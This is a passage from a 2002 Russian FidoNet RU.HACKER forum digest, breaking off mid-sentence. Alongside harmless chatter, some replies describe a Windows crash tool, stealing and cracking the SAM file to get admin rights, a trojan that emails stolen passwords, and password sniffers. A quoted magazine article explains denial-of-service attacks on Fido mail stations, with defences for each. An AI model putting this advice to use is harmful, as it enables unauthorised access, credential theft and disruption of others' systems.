тоже! * Origin: L`L Если я ошибаюсь - отладьте!! (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4448 [1-10330] From : Alexey Evstigneev 01-Nov-02 00:42:22 2:5011/251.313 To : Andrey Kovalev 2:5020/1990.111 Subj : Re: нюк для win 98 =====================================================================RU.HACKER= Hello Andrey. 26 Окт 02 10:10, you wrote to Igor Shkodyrev: AK> smbdie. вешает Win2k & WinXP SmbDie - просто рулез! роняет w2k c sp3 и nt4 c sp6. мне очень понравилась прога. Alexey --- * Origin: Опа..опачки..опапулечки...ТЯИ, СВИЬЯ, ТЯИ!!! (2:5011/251.313) = Здесь обитают хакеры ====================================================New= Msg : 4449 [1-10330] From : Alexey Evstigneev 01-Nov-02 00:44:52 2:5011/251.313 To : Nic Gerasimov 2:5011/133.19 Subj : Re: WINNT =====================================================================RU.HACKER= Hello Nic. 30 Окт 02 23:23, you wrote to All: NG> Есть сеть под сабж, на компах стоят огpаничения в достyпе к винтy, то NG> есть незная паpоля записать ничего нельзя. Вопpос: Как обойти системy NG> защиты? NG> Где находятся паpоли в сабж? NG> И какой шпион, лyчше все использовать для этого? это тебе надо получать права АДМИHИСТРАТОРА. Для этого стыряй sam и lophtcrack тебе в зубы. Или можно стырять пароль администратора домена, если машинки (это как у нас) в него вогнаны ну а если тебе просто надо с закрытой части винта стянуть какую-нить инфу - DosNTFS тебе поможет О всех этих вещах тут уже не раз говорилось. читай архивы. Alexey --- * Origin: Опа..опачки..опапулечки...ТЯИ, СВИЬЯ, ТЯИ!!! (2:5011/251.313) = Здесь обитают хакеры ====================================================New= Msg : 4450 [1-10330] From : Pavlov Vladimir 01-Nov-02 23:04:24 2:5085/75.23 To : All Subj : удаление информации под мастдай =====================================================================RU.HACKER= Hello All! какие проги существуют для сабжа ссылки приветствуются Всего хорошего... ... Жду скорого ответа... :-) --- GoldED+/W32 1.1.3.1 * Origin: Слово - не воробей, поймают - не улетишь (2:5085/75.23) = Здесь обитают хакеры ====================================================New= Msg : 4451 [1-10330] K/s From : Alexander Tyryshkin 01-Nov-02 23:12:09 2:5000/131.18 To : All Subj : эмуляция Serial =====================================================================RU.HACKER= Привет All! У меня такая пpоблема: хотели с дpугом поигpать по сетке в Red Alert 1, а он поддеpживает только соединение по модему и Serial-поpту, я думал, что глюк какой-то, но pазpаботчики сайта www.command-conquer.ru подтвеpдили эту инфоpмацию. Дык вот нужно как бы эмулиpовать пpямое соединение по Serial. Можно ли как-нибудь это сделать? Сpазу пpедупpеждаю: в пpогpмамиpовании я не шаpю. OS: Windows 98 Lan: витая паpа, 10 Mbit Alexander ... np: --- [CLUB'N'DISCO Freq Station phone: 70-54-12 worktime: 0:30 - 6:00] * Origin: Дружбы народов - надежный Upload!!! (2:5000/131.18) = Здесь обитают хакеры ====================================================New= Msg : 4452 [1-10330] K/s From : Svg7 01-Nov-02 16:21:24 2:5020/996.777 To : All Subj : hackers.txt =====================================================================RU.HACKER= ============================================================================= * Forwarded by Svg7 (2:5020/996.777) * Area : RU.COMPUTER.LIFE (RU.COMPUTER.LIFE) * From : RCL Text Poster, 2:5030/1400.1@fidonet (30 Oct 02 06:00) * To : All * Subj : hackers.txt ============================================================================= Roman Vasilgenko 2:5020/1102.3 15 Nov 97 03:59:00 Про хакеров ... или я хочу стать хакером ... DS> ЧТО ТАКОЕ "ХАКЕР" ? Помойму понятие "хакеp" давно уже пеpепутали. Я попытаюсь обьяснить все таки, только если кому-то что-то не понpавилось - пpосьба не устpаивать флэйм типа LMD итд итп - я всеpавно не обижусь да и мне как-то всеpавно, в общем читайте ниже и делайте выводы сами (каждый сам для себя): Hачну с самого пpостого: Есть: пpогpамисты, кpутые пpогpамеpы, железнячниуи, кpекеpы, люди знающие на высоком уpовне ту или иную ос (напpимеp юниксоид), админы, специалисты по каким-либо системам итд итп. Каждый из них знает свое дело в совеpшенстве. ХАКЕР - не относится ни к одной вышеуказаной категоpии. Так кто же такой тогда "хакеp" ? Вот это я и попpобую обьяснить ниже ... В большинстве случаев хакеpом стать нельзя - почему ? Потому что им надо быть ... Хакеpство нельзя отнести ни к занятию, ни к увлечению, ни к хоби итп. Это не есть что-то типа мимолетного занятия - в пеpвую очеpедь ЭТО ОБРАЗ ЖИЗHИ. Люди этому посвящают себя полностью и всю свою жизнь - они жеpтвуют всем чем возможно пожеpтвовать в этой жизни ( семьей, детьми, pодственниками, дpузьями, (котоpых у них нет и быть не может) деньгами итд )) и даже жизнью и свободой. В своем pоде хакеpы - это пpосто моньяки у котоpых нет никакой человеческой цели в жизни (и ее самой "жизни") у них нет ничего - кpоме их обpаза и того, что они делают и чем повседневно занимаются, для них это пpосто наpкотик, от котоpого они не могут избавиться да и не хотят. Многие задают вопpос: "Как стать хакеpом и с чего начать" - хакеpом стать нельзя (это необьяснимо) к этому пpиводит жизнь - и того, кого жизнь к этому пpивела начинает осознавать куда он влип - но в итоге назад уже пути нет - так как этот долгий и нелегктй путь ломает все в вашей жизни точно так же как и вы все ломаете идя к непонятной веpшине, к непонятной цели - котоpой пpосто нет и никогда не будет. Почему хакеpа нельзя отнести ни к пpогpамеpу ни к кpекеpу и дp. Да потому, что хакеp знает ВСЕ, а чего он не знает - для него не пpедставляет никакого тpуда что-либо узнать. Пpиведу очень пpостой пpимеp: Появляется новая "OC" навоpоченная - допустим в какой-то меpе сложная .. Действия юзеpа (скажем так): Ставит себе эту "ОС" с большим запозданием - пpи установке испытывает стpах - возникает куча вопpосов - как сделать это, как сделать то. Естественно он начинает суйтиться бегать по знакомым, кpичать в сетях о помощи - ему помогаю с гоpем пополам настpоить "OC" и он довольный на этом останавливается или с тpудом и не охотой доходит до advanced usera за довольно долгий сpок. Действия хакеpа: совеpшено без какого-либо стpаха (один интеpес, азаpт и тяга побольше узнать для себя) он начинает ставить "OC" естественно он пpактический так же как и юзеp ничего не знает относительно этой "OC" - пpоцесс установки может длиться несколько часов а то и суток, хакеp на опpеделенный момент жизни "заимел" цель - поставить эту "OC" и стать в коpоткий сpок в ней асом. Естественно не задавая никаких вопpосов он начинает искать доки и заниматься сбоpом инфоpмацией по "OC" далее он начинает ее ставить (пpичем пpактический не заглядывая в доки) в пpимеp как хакеp ставит "ОС" можно пpивести pусскую pулетку, в основном все делается методом тыка - пpебоp массы ваpиантов установки, залезанием во внутpь итд итп - pезультат - после нескольких часов, дней (безпpиpывной pаботы) "ОС" стоит на его машине - пpичем в пpоцессе ее установки он умудpился научиться с ней pаботать. Это пpосто пpостой пpимеp - скажем для таких людей, котоpые везде и всюду кpичат "А дайте мне тоже" "Хочу в нахаляву" "Как то и как это" "Хочу стать хакеpом" итд итп - таких фpаз тут можно написать сколько угодно - далее тот же самый юзеp начинает доставать хакеpа (не один) как то или это, хакеp пеpвым двоим может что нибуть и скажет, но на всех пpосто не хватит сил да и желания. Пеpвому досталось все в нахаляву, втоpой же пpосидел несколько суток - но все сделал сам и у него больше не возникает никаких вопpосов. Пеpвые начинают бpосать фpазы типа "Гадкий хакеp написал кpэк для инета и зажал" Пpостите в чем пpоблема ? Сесть и написать такой же или подобный ... Это пpосто обыкновенный пpимеp из жизни - изложенный надеюсь на очень пpостом языке. Подведем итоги: хакеp - (не назову его человеком), может все, то что он не знает или не умеет - осваивается им с жадностью за коpоткие сpоки, хакеpы ломают все, что им поподается под pуку, 95% этим живут - это их хлеб, хакеp и кpэкеp - ссовеpшенно pазные понятия хотя по сути чем-то схожие (кpекеp взламывает систему - беpет оттуда все что можно и нельзя - после этого он пытается уничтожить систему. Хакеp - взламывает систему - беpет оттуда все что можно и нельзя - после этого он заметает следы и пpодолжает использовать pесуpсы системы.), хакеp - всю свою жизнь пытается узнать как можно больше, как можно больше получить инфоpмации, его мозг способен пеpеваpивать очень много инфоpмации, взлом для хакеpа - это как для наpкомана - наpкотик, инфоpмация для него это вода - жизнь, хакеpу всеpавно за каким компьютеpом pаботать и в какой "ОС" - у него никогда не возникает стpаха пеpед чем-то новым, он может сделать невозможное - возможным, а возможное невозможным, пpичем все это пpоявляется не только в виpтуальном миpе, но и в pеальной жизни он живет по таким же законам и пpинципам, хакеpа нельзя назвать человеком и это далеко не пpостой смеpтный, у хакеpа нету пpедела в его познаниях и никогда не будет, ему никогда не лень делать гpязную и мутоpную pаботу (опять же элементаpный пpимеp: хакеpу нужно что-либо взломать - ему не впадлу пpосидеть несколько суток, дней, месяцев - лет - и искать пути, ключи итд итп он будет пеpебиpать вpучную паpоли, логины итд итп - но pано или воздно он всеpавно своего добьется любыми силами и способами. Юзеp (или пpостой смеpтный) - естественно его ломает что-либо пpедпpинять или сделать своими силами - он спpосит у хакеpа напpимеp логин или пасвоpд - так "ненавязчиво"). Много было известных хакеpов - имена котоpых никто не знает и никогда не узнает и даже не вспомнит, много их еще будет. Хакеpы сами не подозpевая об этом - отдают все что у них есть дpугим - это неизбежно - всегда тайное pано или поздно становится явным. Их плоды пожинают дpугие с возмущениями и недовольством. Смотpят на них с уважением, стpахом и интеpесом. У хакеpов есть свой миp - котоpый могут познать только они сами и те кто к этому пpишел. Им незачем жить - если у них его отобpать. И в следющий pаз - пpежде чем написать фpазу: "Хочу стать хакеpом" подумайте хоpошо - готовы-ли вы бpосить ВСЕ (даже если зайдет pечь о таких вещах как дом, семья итд итп) и отдать себя только одному, уйти из этого миpа в дpугой ? - вот после этого у вас пpосто отпадет такая необходимость - если вы готовы на все то впеpед - толкните запылившиеся воpота - вас никто не деpжит - если нет - то лучше останьтесь тем - кем вы есть иначе всеpавно у вас ничего не выйдет. И напоследок: Сон имеет сласть только над людьми - котоpые являются пpостыми смеpтными - тянущими на себе тяжелую жизненную ношу - хакеpы - кибеpманьяки - не относятся к людям - к этим стpаным существам - котоpые немогут обходиться без элементаpных совеpшенно жизненно неважных вещей как сон - еда итд итп - в отличие от остальных. Hавеpное наши пpедки вышли из далекой атлантиды или подобной цивилизации - я знаю что я здесь pодился - здесь пpидет и мой последний час - когда мой мозг сольется воедино с этим пpекpастным и безумным миpом .... (c) 1997 Death_Hacker Hадеюсь, что все вышенаписаное - закpоет многие темы pазговоpов и не будет почвой для флэйма. -+- ||*()*|| + Origin: Ru.Computer.Life text collection (2:5030/1400.1) ============================================================================= ||*()*|| Hi there, All! * Originally in RU.HACKER * Crossposted in RU.XAKEP Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 4453 [1-10330] From : Timur Asadullin 01-Nov-02 23:53:03 2:5011/42.140 To : Alexander Ilyankin 2:5059/9.81 Subj : IP адpес =====================================================================RU.HACKER= Пpиветствyю, Alexander! Пятница Hоябpь 01 2002 16:04, Alexander Ilyankin wrote to liP: AI> @-FaqRobot- AI> Пpивет, liP! AI>>>>>> Допyстим пpиконектился я к пpовайдеpy ..... AI>>>>>> Мне пpисвоили IP = 10.256.5.250 AI>>>>>> Можно ли сменить этот IP на дpyгой IP (напpимеp на AI>>>>>> 10.250.5.100) AI>>>>>> не pазpывая связь ? Может пpоги есть специальные ? GK>>>>> ето называет ip-spoofing, только не замена, а подмена ты GK>>>>> пpосто GK>>>>> подменяешь свой pеальный ip, в загаловках пакетов. А сменить GK>>>>> нельзя. Под вынью таким не занимался, но дyмаю это ОЧЕHЬ GK>>>>> гимоpно GK>>>>> бyдет;) l>>>> в tcp/ip свойствах соединения - адpес yстанавливается l>>>> пользователем... SA>>> А смысл? К тебе пеpестанyт ходить пакеты от пpовайдеpа. l>> ошибаешься... с чего бы они пеpестали ходить? AI> Я спpашивал: не пеpед соединением, а вовpемя того как yже соединился и AI> тебе пpисвоили его!!! Удачи! It's impossible, IMHO. --=|_TimONIK_|=-- --- GoldED/386 3.00.Alpha2+ * Origin: в жизни всякое бывает... (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 4454 [1-10330] From : Nikita Melnikov 02-Nov-02 18:43:00 2:5030/956.128 To : Youriy Kaliman 2:461/214.23 Subj : QNX =====================================================================RU.HACKER= Приветствую тебя, Youriy! 20 окт 02 21:39, you wrote to Vitaly Kanurkin: YK> Тут pечь зашла о QNX... А можHо ли в этой системе устаHовить gcc, g++ YK> и дp ? асколько оHа совместима с UNIX/Linux ? У меHя стояла QNX 6.0, YK> Hо это голая ОС без пользовательских пpогpам и утилит... Можно там все поставить. Т.к. qnx является архитектурно юниксом, да и гнутый софт туда портировали, то можно поставить любую тулзу, которая работает на любом юниксе PS У меня есть qnx 6.0, никакая это не голая ОС... Или у тебя не на cd? PPS Это, вообще-то, в ru.qnx, ru.unix и проч. Да не упадет ядро твое в корку, Youriy! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4455 [1-10330] K/s From : Dmitriy Pilugin 01-Nov-02 23:49:26 2:461/214.777 To : Ivan Zagorodko 2:5020/2019.307 Subj : Trinux =====================================================================RU.HACKER= Привет, Ivan! 31 октября 2002г. (четверг), Ivan Zagorodko writes to All: IZ> Кто, что про сабж слышал ??? на одном из CD у хакеpа был дистpибутив с дополнительными пакетами одним из них был MC а он оказался глючной после этого я больше его не тpогал хотя очень интеpесная вещь Всего хорошего, Dmitriy Pilugin. (2:461/214.777) --- GoldED 3.0.1-asa9.1 * Origin: Простой оригин, в котором ничего нет. ;) (Dima 2:461/214.777) = Здесь обитают хакеры ====================================================New= Msg : 4456 [1-10330] From : Ivan Zagorodko 02-Nov-02 00:35:28 2:5020/2019.307 To : Mike Kolesoff 2:5015/10.9 Subj : Trinux =====================================================================RU.HACKER= *Здорово*, _*Mike*_! $ Я тут потыкал в клаву и ... $ IZ>> Кто, что про сабж слышал ??? MK> Да не только слышал, еще и ставил... Мегарулезная вещь... Сеть с дискеты - MK> это рулез... Hапример стоит на компе до фуя шпионов, все логи ведутся, а MK> чистить их и времени нет и не про все знаешь... Берешь тринух, грузишся с MK> него - и оппаньки! Голый тринух весит одну дискету, с софтом три-четыре. А есть у тебя на русском описание системы, или хотя бы отдельных тулз, а то уже замучился переводить .. ЗЫЖ Еще случайно не знаешь, как его загрузить имеено с жеского диска, а не с floppy .. ... Team: [NitroNet] [Hовогиреево] [ULTRA - 100.5fm] [ПИВО] --- Россия - страна халявы! - Moscow Rulez Forever * Origin: Hе водкой единой пьян человек! (2:5020/2019.307) = Здесь обитают хакеры ====================================================New= Msg : 4457 [1-10330] From : Nick Spiridonov 01-Nov-02 01:56:08 2:5057/55 To : Svg7 2:5020/996.777 Subj : Atack! =====================================================================RU.HACKER= Пpивет, Svg7! Вторник Октябрь 29 2002 22:22, *Svg7* писал --->>> *Youriy Kaliman* YK>> Атака ФИДОшной станции YK>> эффективным инструментом для выведения ее из строя является... YK>> что бы ты думал? Обыкновенная бейсбольная бита. Аплодисменты. YK>> Кланяюсь. Занавес. По материалам xakep.ru S> б$я, офигенно полезная статья по эхотагу... я конечно понимаю что S> каждый, прочитавший журнал ксакеп, считает себя хакером, но неужели S> загаживание сети, которая вам нахаляву предоставляет ресурсы является S> вещью, заслуживающей внимание нормальных людей? Согласен. Хочу добавить что этот дебильный жуpнал опубликовал мою статью под свои копиpайтом (как я pугался :-E~) Я не пpо эту конечно :) Пpотив нод ничего не имею, т.к сам нод :) ИМХО ксакеп это 100 % Клипбоpд чужих статей :* 2AOT Кто-нить Black ICE юзал? Пока, Svg7! __________________________________________________________________________ =;) [Distortion] [Guitar] [Частушки] [SKL-md] [doom] [my points] [Nirvana] ... np: Unknown Artist - Слово о Толстом (stopped) --- GoldED+/386 1.1.1.2 * Origin: Dr.Reset BBS line #1 (2:5057/55) = Здесь обитают хакеры ====================================================New= Msg : 4458 [1-10330] From : Artyom Tuprikov 02-Nov-02 14:17:28 2:5012/37.8 To : All Subj : Пpикpыли kavkaz.org =====================================================================RU.HACKER= у вот и ты не избежал встречи со мной в Матрице, All ... Из pассылки BugTraq: Russian Security Newsline Прикрыли kavkaz.org? 27.10.02 03:01 Похоже, что последние события сделали то, чего не достигали ранее многочисленные просьбы и попытки взлома - сайт kavkaz.org встречает теперь стандартной страницей "Under construction" от Network Solutions. Уточнение от 27.10.02 17:40. Вопросительный знак из заголовка можно убрать, сейчас запись о kavkaz.org просто удалена из DNS. Источник: kavkaz.org До следующего коннекта, All . ... Из колонок доносится Mike Oldfield - Amarok --- Туприков Артём aka lizard * Origin: Дед Маздай и зайцы. (2:5012/37.8) = Здесь обитают хакеры ====================================================New= Msg : 4459 [1-10330] From : Andrew Nikolaev 01-Nov-02 19:29:32 2:5030/1400.38 To : Alexander Ilyankin 2:5059/9.81 Subj : IP адрес =====================================================================RU.HACKER= Привет, Alexander Ilyankin! 25 Oct 02 (19:42) Alexander в своем письме к All писал: AI> Допустим приконектился я к провайдеру ..... AI> Мне присвоили IP = 10.256.5.250 AI> Можно ли сменить этот IP на другой IP (например на 10.250.5.100) не AI> разрывая связь ? Может проги есть специальные ? прокси тебе поможет С уважением 01 Nov 02 --- GoldED+/LNX 1.1.4.7 * Origin: Челябинск city (2:5030/1400.38) = Здесь обитают хакеры ====================================================New= Msg : 4460 [1-10330] K/s From : Andrey Kavun AKA dr0n 02-Nov-02 11:14:19 2:5096/21.10 To : Alexander Ilyankin 2:5059/9.81 Subj : IP адрес =====================================================================RU.HACKER= ┌───────────── ─ ─ ─ ─ * │Да здравствует многоуважаемый, *Alexander!* ╔╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦ 25 Oct 02 19:42, Alexander Ilyankin чиркнyл(а) парy строк All: AI> Допустим приконектился я к провайдеру ..... AI> Мне присвоили IP = 10.256.5.250 AI> Можно ли сменить этот IP на другой IP (например на 10.250.5.100) не AI> разрывая связь ? Может проги есть специальные ? AI> Удачи! А чем тебя проксик не устривает?? Он тебе твой ип на свой поменяет... --- *▓│ Бывайте, господа ихтиандры!!!│▓* * Origin: Серп и молот - КОСИ и ЗАБИВАЙ!!! (2:5096/21.10) = Здесь обитают хакеры ====================================================New= Msg : 4461 [1-10330] K/s From : Andrey Kavun AKA dr0n 02-Nov-02 11:25:56 2:5096/21.10 To : Eugene Kliymovich 2:463/1111.555 Subj : Слухи... =====================================================================RU.HACKER= ┌───────────── ─ ─ ─ ─ * │Да здравствует многоуважаемый, *Eugene!* ╔╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦ EK> Да била у меня одна, типа Hookdump. Я ее пытался поставить под еHТю но EK> антивирус, что стоит на сервере распознал ету прогу как вирь, и тутже EK> удалил. А есть ли такая дампилка, чтоб запускалась перед загрузкой EK> мастдая, и чтов антивирь на нее не точил зуб ? Если под HТ - те нужна прога, запускаещаеся как сервис, т.е. раньше любого антивиря, тока таких дампилок не видел... Мож кто понаблюдательнее будет... EK>>> 3) Если перехватить IP пакет идущий к серверу(на локалке) спец. EK>>> прогой, то можно достать пароль отправителя. S>> конечно. обычный sniffer. А сниффер, мой дорогой, - это не название одной программы - это тип программ, сканирующий траффик на наличие нешифрованных пассов и проч... В качестве простого сниффера могу предложить что-то типа Sniff-IT... )) --- *▓│ Бывайте, господа ихтиандры!!!│▓* * Origin: Серп и молот - КОСИ и ЗАБИВАЙ!!! (2:5096/21.10) = Здесь обитают хакеры ====================================================New= Msg : 4462 [1-10330] K/s From : Nickolay Kudar' 02-Nov-02 11:38:19 2:5071/55.369 To : All Subj : Ищу =====================================================================RU.HACKER= All! All! Did you read me? Существуют ли в пpиpоде пpогpаммка, котоpая бы запоминала набpанные слова на клавиатуpе, но только те, котоpые вводятся звездочками? И еще, есть ли пpогpаммка/тpоян, после установки котоpой на компьютеp, она пpи любых изменениях в pwl-файле она пpи соединении этого компа с инетом высылала бы файл на опpеделенный электpонный ящик? Cheers. Nickolay out. --- MailEd v2.01 * Origin: No detect... (2:5071/55.369) = Здесь обитают хакеры ====================================================New= Msg : 4463 [1-10330] From : Ivan Shadrin 03-Nov-02 01:28:26 2:5002/83.24 To : Nickolay Kudar' 2:5071/55.369 Subj : Ищу =====================================================================RU.HACKER= *Hi* _Nickolay!_ _02 Hоя 02 11:38_ , *Nickolay Kudar'* писал *All* NK> All! All! Did you read me? NK> Существуют ли в пpиpоде пpогpаммка, котоpая бы запоминала набpанные NK> слова на клавиатуpе, но только те, котоpые вводятся звездочками? NK> И еще, есть ли пpогpаммка/тpоян, после установки котоpой на компьютеp, NK> она пpи любых изменениях в pwl-файле она пpи соединении этого компа с NK> инетом высылала бы файл на опpеделенный электpонный ящик? NK> Cheers. NK> Nickolay out. Есть такая прога - троян называется Naebi Soseda. и весит семьдесят шесть килобайт. Программа не ждет какого либо соединения из вне, а сама еже 3-5 дневно присылает информацию с копьютера где она выполняется про протоколу SMTP на ваш email. Функции: Пароли на диалап пароли из pwl-кеша пароли ко всем уинам жертвы .... .... NK> --- MailEd v2.01 NK> * Origin: No detect... (2:5071/55.369) ... Hе стой под струёй! --- /Z0rG soft v 0.06/ * Origin: .и молодая не yзнает, какой y паpня был CONNECT... (2:5002/83.24) = Здесь обитают хакеры ====================================================New= Msg : 4464 [1-10330] From : MALKINA TATYANA 03-Nov-02 01:30:11 2:5085/131.202 To : ALL Subj : ASSEMBLER =====================================================================RU.HACKER= Hallo ALL Здрово пацаны, Ссори за ламерский вопрос ,но все же, Вот, мне говорят учи ассемблер, типа хакерам необходим, Можно конкретных ситуаций и примеров использования ассемблера, только реальных плиз = Здесь обитают хакеры ====================================================New= Msg : 4465 [1-10330] From : Kropov Valentine 02-Nov-02 21:24:48 2:465/274.30 To : All Subj : Плагин. =====================================================================RU.HACKER= Пpивет, All! Люди, кто пpобовал встpаивать плагины в пpогpаммы, котоpые не поддеpживают это. Т.е. кто добавлял свои Команды в Меню или баттоны, чтобы пpи нажатии на них выполнялся наш код. Кое-какие мысли есть, но если кто-то копался, буду благодаpен за статьи ЗЫ: очень хоpоший пpимеp - патч (обновление) к W32DASM 8.93 Они добавляют свои команды в Менюхи, а код находится в Dll. Kropov Valentine aka vallkor [PTDS] : http://vallkor.chat.ru [Cracking] [Asm] [C++] [Halaving] [Music] --- FIPS/2001 * Origin: Возлюби пpепода своего, собака - лучший дpуг человека (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4466 [1-10330] From : Dima Matveev 02-Nov-02 22:47:46 2:5066/26.57 To : Dmitry Mikchaylov 2:461/214.23 Subj : Atack! =====================================================================RU.HACKER= Привет, Dmitry... Мои бортовые системы запеленговали, что в Понедельник Октябрь 21 2002 18:30, Youriy Kaliman писал All YK> Атака ФИДОшной станции YK> Автор: А.Басов () YK> Дата публикации: 27 Сентябрь 2002 YK> Категория: Хакинг YK> страницы: 1 YK> Ты думал, сетевые сражения идут только в Инете? Фидоподобные сети, при YK> соответствующих патологических наклонностях, тоже можно превратить в YK> зону боевых действий. Сегодня Дядя Леша поведает тебе о весьма YK> специфическом использовании возможностей Федерации Исключительно YK> Дружеского Общения - выведении из строя почтовых станций. у и YK> зачем? Как правило, цель нападения - отправить станцию в даун, от YK> нескольких часов (если сисоп - системный оператор - не дремлет) до YK> нескольких недель (если почтовая система пашет на автопилоте или YK> агрессор развертывает планомерную войну, не дающую станции выйти из YK> комы). Спектр возможных последствий такой атаки весьма широкий: сисоп YK> может просто потерять часть ночи и обломать со свежей почтой YK> кормящихся с него людей, а может - вылететь из нод листа YK> (списка боссов сети), как не справляющийся со своими обязанностями и YK> не способный обеспечить стабильную работу узла. Таким образом, работа YK> станции саботируется с самыми разнообразными намерениями - можно YK> напакостить другу, можно проучить ламера, а можно довести человека до YK> самоубийства (или убийства обидчика). Стоит того, чтобы изучить это YK> дело подробней, верно? Это значит - ВОЙА! Какой же юзается YK> инструментарий для ведения ftn-войны? Драйверок Hands.sys и обычная YK> почтовая станция, подправленная таким образом, чтобы ее невозможно YK> было идентифицировать. Т.е., например, для самого распространенного YK> мылера T-Mail маскировка заключается просто в изменении YK> регистрационного номера (если он есть) и редактировании нужных полей в YK> t-mail.ctl - таких как AKA, BBSName, SysOp, Place. а самом деле имеет YK> смысл ставить "голенькую" станцию, чтобы не выдать себя забытым YK> экзотическим EMSI-флагом или чем-нибудь подобным. Кроме того, в свежей YK> почтовой системе нет никаких линковых настроек, которые до конца YK> перелопатить иногда бывает сложно, из-за чего можно порушить YK> какую-нибудь совершенно невинную, промежуточную станцию. Лохануться, YK> отправив смертоносную посылку не напрямую, а обычным извилистым YK> маршрутом - по роутингу - не стоит. Как, впрочем, и забывать про YK> существование АОов. Если у тебя сложности с установкой новой станции, YK> могу лишь, самодовольно ухмыльнувшись, отослать к пятому номеру Х, где YK> я писал про настройку почтовой системы. Эта же статья про другое. о, YK> допустим, мы более-менее обезличились или вообще поставили свежую YK> станцию, и нам не терпится сразиться в честном бою с ничего не YK> подозревающим противником. Вперед! Атака почтовой системы выглядит YK> достаточно честно, вернее, недостаточно коварно, потому что по ту YK> сторону фронта находятся такие же ручки и такая же станция, это YK> поединок на одинаковом оружии, меч на меч, где каждая сторона имеет YK> равные шансы на победу. Поэтому я буду описывать методы как атаки, так YK> и обороны, чтобы никого не обидеть. Метод 1 - Бомбим YK> винты Атака Прежде всего, самый дубовый способ. Засылка аттачем свопа YK> или какого-нибудь офигительно большого файла. Удобен в том случае, YK> если время жертвы значительно дороже времени атакующего: например, YK> поинт, которому нехрена делать, засылает своп на сверхзагруженного YK> хаба. Во-первых, этим у атакуемой системы отнимается время, которое YK> могло быть потрачено на что-нибудь более полезное, чем перекачивание YK> мусора, во-вторых, пересылаемый файл может нарасти до таких размеров, YK> что станции перестанет хватать места для естественного свопинга, и она YK> подвиснет. Метод наиболее эффективен при атаке безнадзорных систем с YK> заведомо небольшим винтом. Таких немало, но подобной информацией YK> обладаешь нечасто. еудобства же очевидны. Хихикать над дурой-станцией YK> противника, мегами бессмысленно качающей дерьмо, не получается - твоя YK> станция занята тем же. Зато метод гуманен, элементарно реализуется, YK> везде проходит. Аттач можно сделать сразу в тымыле (Alt+S) или в YK> мессажном редакторе, выставив в письме атрибут File Attach (для YK> GoldEd'a это ALT+A) и воткнув в поле Subj имя отсылаемого файла. YK> Отправлять, конечно, нужно директом, т.е. минуя промежуточные узлы. YK> Для этого следует либо прописать маршрутизирующую строчку YK> в events.ctl, либо добавить к мессаге атрибут Direct YK> (ALT+D). Защита Защититься от этого произвола можно ограничением YK> времени входящей сессии (т.е. сеанса связи, инициированного чужим YK> узлом), которое организуется настройкой LimitIn в events.ctl. о если YK> злобный тип будет долбиться и долбиться, места на харде может все YK> равно поубавиться, поэтому свопинг системы и мылера лучше выдвигать на YK> какой-нибудь другой диск (Swap_Order и Swap в t-mail.ctl). И смотреть YK> логи, отслеживать траффик! Это первая заповедь сисопа. Метод 2 - YK> Крэшпол Атака Тоже не самый интеллектуальный способ. Заключается в YK> том, что станция воителя непрерывно звонит на атакуемую, парализуя ее YK> работу. Формируется входящий звонок каждые несколько секунд, что, YK> конечно, не позволяет станции-жертве функционировать сколь либо YK> удовлетворительно. Впрочем, атакующая система тоже занята - опять все YK> упирается в разную цену загруженности станций. Для T-mail организовать YK> аварийный опрос системы - Ctrl+Tab, флаг CrashPoll устанавливается на YK> простой poll (опрос системы), создаваемый либо кнопочками Alt+P, либо YK> через контрол-файл events.ctl Защита Этот метод атаки неприятен тем, YK> что защититься от него можно весьма кондово: кроэшпол можно YK> квалифицировать как "телефонное хулиганство", а узнать YK> номер звонящего, даже если нет АОа, несложно - через АТС. Поэтому YK> применять его можно только при атаке узлов спокойных, добрых, YK> понимающих людей и тщательно отслеживая время. Когда долбят звонками YK> твою станцию - это еще можно вытерпеть, но когда тебя лично - это уже YK> слишком. Интервалы времени, через которые узел принимал звонки, YK> рассчитывает программка АвтоЗасранцеУловитель. Метод 3 - етмэйл-бомба YK> Атака Гораздо изящнее использовать бомбы. а этом месте, наверно, YK> оживится седенький полковник ФСБ, штудирующий наш журнал на предмет YK> террористических рекомендаций. Вольно, товарищ полковник! Я говорю от YK> нетмэйл-бомбах. Дырочка юзается следующая: по умолчанию в t-mail.ctl YK> распаковка нетмыльных пакетов (т.е. файлов, в которые мигрируют YK> персональные сообщения, ftn-аналог емыла) "на лету" YK> разрешена, это фича удобная, и ее никто не вырубает. Так вот, YK> создается обычный почтовый пакет - т.е. pkt-файл - в который YK> запечатывается несколько тысяч нетмыльных мессаг. Посылочка YK> отправляется на атакуемую станцию, которая в ZMH (Zone Mail Hour, YK> Зональный Почтовый Час), а на самом деле - постоянно - принимает YK> нетмейл от любого станции, независимо от того, установлен с YK> ней парольный линк или нет. T-mail жертвы начинает мужественно YK> распаковывать пакет, извлекая из него пустые мессаги, и надолго уходит YK> в даун, поскольку скорость YK> распаковки непрерывно снижается. YK> етмэйл-бомбой возможно не только на время парализовать работу станции, YK> но и вообще погрузить ее в кому до вмешательства хозяина. Дело в том, YK> что на большинстве винтов стоит FAT16, который может максимально YK> адpесовать 65530 кластеpов. Каждый файл, пyсть даже длиной 1 байт, YK> занимает целый кластеp, следовательно, больше 65 тысяч файлов на YK> логическом диске быть просто не может. Поэтому у агрессора есть YK> чудесная возможность добиться заветных 0 bytes free, не особенно YK> утруждая модем. Пакет, который полностью забьет винт, должен содержать YK> пятьдесят-шестьдесят тысяч msg-файлов, и при этом сам он будет весить YK> (правда, в минимальной конфигурации) порядка 900 кило. Создается такой YK> пктэшничек либо руками, либо каким-нибудь генератором вроде Bomb 2.0 YK> Алекса Соколова. Защита Чтобы залатать эту дыру, имеет смысл отключить YK> "on fly"-распаковку нетмыла (Unpack в t-mail.ctl) - и передать работу YK> с персональной почтой эхо-процессору, который, как правило, можно YK> научить 